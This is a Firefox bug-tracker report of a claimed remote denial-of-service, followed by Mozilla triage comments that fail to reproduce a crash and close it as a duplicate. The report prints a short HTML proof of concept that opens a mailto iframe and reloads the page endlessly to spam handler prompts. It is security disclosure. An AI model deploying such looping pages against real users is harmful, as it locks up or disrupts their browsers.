1435497 - Remote DoS vulnerability tested on Firefox Quantum 58.0.1 (Windows 10 64-bit)

Status: RESOLVED DUPLICATE of bug 167475

(Firefox :: Security, defect)

Description

[Ahmed Al Ghafri]

Attachment: DoS_ff.html

User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36

Steps to reproduce:

1-. Open the following link in Firefox, 
Test link:
http://beinsecurity.com/DoS_ff.html

2- Infinite loop trying to open email client causing a crash in Firfox.

Exploit code:

<html>
<body>
<!-- Remote DoS vulnerability tested on Firefox Quantum 58.0.1 (Windows 10 64-bit) -->
<iframe src="mailto://al-ghafri@hotmail.com"></iframe>
<script>location.href='DoS_ff.html';</script>
</body>
</html>



Actual results:

Infinite loop trying to open email client causing a crash in Firfox.


Expected results:

detecting the mal loop and ask the user to kill the page

Comment 2

[Frederik Braun [:freddy]]

Your attachment has a script of "while (true) do { }", so I used the one in your comment, which seems to make more sense.

But I can't reproduce with either of the following settings.
a) open 'mailto:' URLs in Thunderbird
b) open 'mailto:' URLs unassigned (our own prompt)


All I get is lots of prompts.
How long did you let this run, Ahmed?


I've tested Firefox Release (58.0.1).

Comment 3

[Daniel Veditz [:dveditz]]

Tanvi: external app prompt spamming (particularly mailto:) seems like a duplicate of one of the bugs on the eviltraps burn-down list. Do you know which one?

Comment 4

[Tanvi Vyas[:tanvi]]

Maybe https://bugzil.la/167475 or https://bugzil.la/424201.  Other options I found - 
https://bugzil.la/331334, https://bugzilla.mozilla.org/show_bug.cgi?id=1361653

Comment 5

[Daniel Veditz [:dveditz]]

Not the same external handler, but the same DoS technique.

Comment 6

[Virtual_ManPL [:Virtual] 🇵🇱 - (please needinfo? me - so I will see your comment/reply/question/etc.)]

Cleaning per duplicate.